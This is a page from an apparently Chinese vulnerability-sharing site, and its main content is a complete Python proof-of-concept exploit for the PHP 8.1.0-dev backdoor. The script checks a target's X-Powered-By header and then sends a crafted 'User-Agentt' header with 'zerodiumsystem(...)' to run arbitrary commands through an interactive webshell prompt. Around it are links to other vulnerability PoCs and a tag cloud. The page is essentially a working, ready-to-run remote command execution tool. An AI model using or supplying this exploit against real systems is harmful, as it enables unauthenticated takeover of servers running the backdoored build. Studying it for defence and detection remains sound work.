PHP_8.1.0-dev_後門遠程命令執行_pt

010

# PHP 8.1.0-dev 後門遠程命令執行/pt

== Impacto de vulnerabilidade ==

PHP 8.1.0-dev

==POC==

#!/usr/bin/env python3

# Exploit Title: PHP 8.1.0-dev WebShell RCE (Unauthenticated)
# Date: 2021-05-31
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.php.net/
# Software Link: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
# Version: PHP 8.1.0-dev
# Tested on: Kali GNU/Linux 2020.3
# Author website: https://coldfusionx.github.io
# Author email: coldfusionx@outlook.com
# Detailed POC: https://github.com/ColdFusionX/PHP-8.1.0-dev_WebShell-RCE

import argparse, textwrap
import requests
import sys


parser = argparse.ArgumentParser(description="PHP 8.1.0-dev WebShell RCE by ColdFusionX", formatter_class=argparse.RawTextHelpFormatter, 
epilog=textwrap.dedent(''' 
Exploit Usage : 
./exploit.py -l http://127.0.0.1
[^] WebShell=- id
OR
[^] WebShell=- whoami
'''))                     

parser.add_argument("-l","--url", help="PHP 8.1.0-dev Target URL(Example: http://127.0.0.1)") 
args = parser.parse_args()

if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -l [url]")          
    sys.exit()  

# Variables
Host = args.url

r = requests.session()

## Use this for Proxy
#r.proxies.update( { 'http':'http://127.0.0.1:8080' } ) 

def svcheck():
    verify = r.get(f'{Host}')

    if (verify.headers['X-Powered-By'] == 'PHP/8.1.0-dev') :
        print("Target is running on PHP 8.1.0-dev\n")
        return True

def exec():
    headerscontent = {
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'User-Agentt' : f'zerodiumsystem("{Command}");'
                     }
 
    door = r.get(f'{Host}', headers = headerscontent, allow_redirects= False)

    resp = door.text.split("")[0]
    if (resp == ""):
        print()
        print("Invalid Command")
        print()   
    else:
        print()
        print(resp)


if __name__ == "__main__":

    print ('\n[+] PHP 8.1.0-dev WebShell RCE by ColdFusionX \n ')
    try:    
        if svcheck() == True:
            print("*Shoot your commands below* \n")
            try:
                while True:
                    Command = input("[^] WebShell=- ")
                    exec()
            except:
                print("\r\nExiting.")
                sys.exit(-1)
    
    except Exception as ex:
        print('Invalid URL or Target not Vulnerable')
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20241201版本)-棉花糖会员站
会员必看手册(20241201版本)
会员必看手册(20241201版本)
9月20日 1.8W+
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 3621
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
11月17日 3565
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
9月29日 3074
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2428
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2403
相关推荐
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
6月1日 1110
易思智能物流无人值守系统 login SQL注入-棉花糖会员站
易思智能物流无人值守系统 login SQL注入
易思智能物流无人值守系统 login SQL注入
11月6日 785
湖南强智教务管理系统存在 任意文件下载-棉花糖会员站
湖南强智教务管理系统存在 任意文件下载
湖南强智教务管理系统存在 任意文件下载
10月21日 718
投稿:多个poc-棉花糖会员站
投稿:多个poc
投稿:多个poc
10月19日 647
金蝶天燕ApusicServer servicefactoryservice 远程命令执行-棉花糖会员站
金蝶天燕ApusicServer servicefactoryservice 远程命令执行
金蝶天燕ApusicServer servicefactoryservice 远程命令执行
10月24日 645
用友U8 Cloud 多处反序列化RCE-棉花糖会员站
用友U8 Cloud 多处反序列化RCE
用友U8 Cloud 多处反序列化RCE
12月8日 620
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
老外百万赏金猎人直播课录屏第三课、第四课
黄药师药业管理软件XSDService.asmx 任意文件上传
飞鱼星路由器htpasswd 信息泄露
致翔软件致翔OA-open_juese SQL注入
秒优科技供应链管理系统doAction SQL注入
神州数码DCME-320 online_list.php 任意文件读取
最近一周热门文章

1老外百万赏金猎人直播课录屏第三课、第四课

棉花糖的头像-棉花糖会员站年费会员12月22日
9999638

2YXcms建站系统版本1.2.7

flycat的头像-棉花糖会员站年费会员12月25日
229
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密